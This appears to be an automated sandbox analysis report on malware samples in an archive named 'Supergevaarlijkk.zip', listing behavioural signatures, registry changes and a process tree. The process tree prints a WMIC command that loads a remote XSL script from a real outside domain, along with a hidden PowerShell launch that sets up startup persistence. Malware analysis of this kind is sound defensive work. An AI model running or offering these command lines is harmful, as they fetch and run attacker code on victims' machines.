Analysis
max time kernel: 130s
max time network: 149s
resource: win10v191014
Task: task1
Sample: 0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource: win7v191014
Task: task2
Sample: 0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource: win10v191014
Task: task3
Sample: 0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource: win7v191014
Task: task4
Sample: 0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource: win10v191014
Task: task5
Sample: 91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource: win7v191014
Task: task6
Sample: 91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource: win10v191014
Task: task7
Sample: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource: win7v191014
Task: task8
Sample: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource: win10v191014
Task: task9
Sample: fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource: win7v191014
Task: task10
Sample: fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource: win10v191014
General
Target: Supergevaarlijkk.zip
Sample: 191029-p1j1431a9n
SHA256: 6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac
Malware Config
Signatures
Drops file in system dir 40 IoCs
Loads dropped DLL 3 IoCs
- PID 4028 MsiExec.exe
- PID 4792 nvsmartmaxapp.exe
- PID 4788 wmplayer.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs
- PID 5032 msiexec.exe
- PID 4588 powershell.exe
- PID 4788 wmplayer.exe
Drops startup file 1 IoCs
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk (PID 4588 powershell.exe)
Suspicious use of AdjustPrivilegeToken 55 IoCs
Uses Task Scheduler COM API 1 TTPs 19 IoCs
Uses Volume Shadow Copy Service COM API 3 IoCs
- Key opened: \Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623} (PID 4588 powershell.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623} (PID 4588 powershell.exe)
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} (PID 4588 powershell.exe)
Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer (PID 908 svchost.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName (PID 908 svchost.exe)
Executes dropped EXE 2 IoCs
- PID 4248 lcC4E6.tmp
- PID 4792 nvsmartmaxapp.exe
Discovering connected drives 3 TTPs 1 IoCs
- File opened (read-only): \??\C: (PID 4812 msiexec.exe)
Suspicious use of WriteProcessMemory 8 IoCs
- PID 5032 wrote to memory of 360 (5032 msiexec.exe, procid_target 76)
- PID 360 wrote to memory of 4324 (360 MsiExec.exe, procid_target 77)
- PID 5032 wrote to memory of 4028 (5032 msiexec.exe, procid_target 79)
- PID 3980 wrote to memory of 3700 (3980 SppExtComObj.exe, procid_target 81)
- PID 4324 wrote to memory of 4588 (4324 WMIC.exe, procid_target 83)
- PID 4028 wrote to memory of 4248 (4028 MsiExec.exe, procid_target 85)
- PID 4588 wrote to memory of 4792 (4588 powershell.exe, procid_target 86)
- PID 4792 wrote to memory of 4788 (4792 nvsmartmaxapp.exe, procid_target 87)
Uses Volume Shadow Copy WMI provider 3 IoCs
- Key opened: \Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C} (PID 4588 powershell.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C} (PID 4588 powershell.exe)
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} (PID 4588 powershell.exe)
Suspicious use of FindShellTrayWindow 1 IoCs
- PID 4812 msiexec.exe
Windows security modification 2 IoCs
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" (PID 1784 svchost.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" (PID 1784 svchost.exe)
Processes

C:\Windows\system32\msiexec.exe (PID 4812)
Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
- Suspicious use of FindShellTrayWindow

\??\c:\windows\system32\svchost.exe (PID 4916)
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost

C:\Windows\system32\svchost.exe (PID 4952)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc

C:\Windows\system32\msiexec.exe (PID 5032)
Command line: C:\Windows\system32\msiexec.exe /V
- Drops file in system dir
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\Windows\System32\MsiExec.exe (PID 360)
Command line: C:\Windows\System32\MsiExec.exe -Embedding CBFCADDEA50F5525DF9B9F6C1CD146DD
- Suspicious use of WriteProcessMemory

C:\Windows\System32\Wbem\WMIC.exe (PID 4324)
Command line: "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\Windows\syswow64\MsiExec.exe (PID 4028)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 6122D15D3738E3CFE5A11A126B91AC11
- Loads dropped DLL
- Suspicious use of WriteProcessMemory

C:\Windows\system32\SppExtComObj.exe (PID 3980)
Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
- Suspicious use of WriteProcessMemory

C:\Windows\System32\SLUI.exe (PID 3700)
Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4588)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
- Suspicious behavior: EnumeratesProcesses
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Uses Task Scheduler COM API
- Uses Volume Shadow Copy Service COM API
- Suspicious use of WriteProcessMemory
- Uses Volume Shadow Copy WMI provider

C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp (PID 4248)
Command line: "C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp"
- Executes dropped EXE

C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe (PID 4792)
Command line: "C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe"
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of WriteProcessMemory

C:\Program Files (x86)\Windows Media Player\wmplayer.exe (PID 4788)
Command line: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

\??\c:\windows\system32\svchost.exe (PID 3660)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s BITS
- Drops file in system dir

\??\c:\windows\system32\svchost.exe (PID 4528)
Command line: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

\??\c:\windows\system32\svchost.exe (PID 908)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
- Checks system information in the registry (likely anti-VM)

\??\c:\windows\system32\svchost.exe (PID 1784)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
- Windows security modification

\??\c:\windows\system32\svchost.exe (PID 1052)
Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1089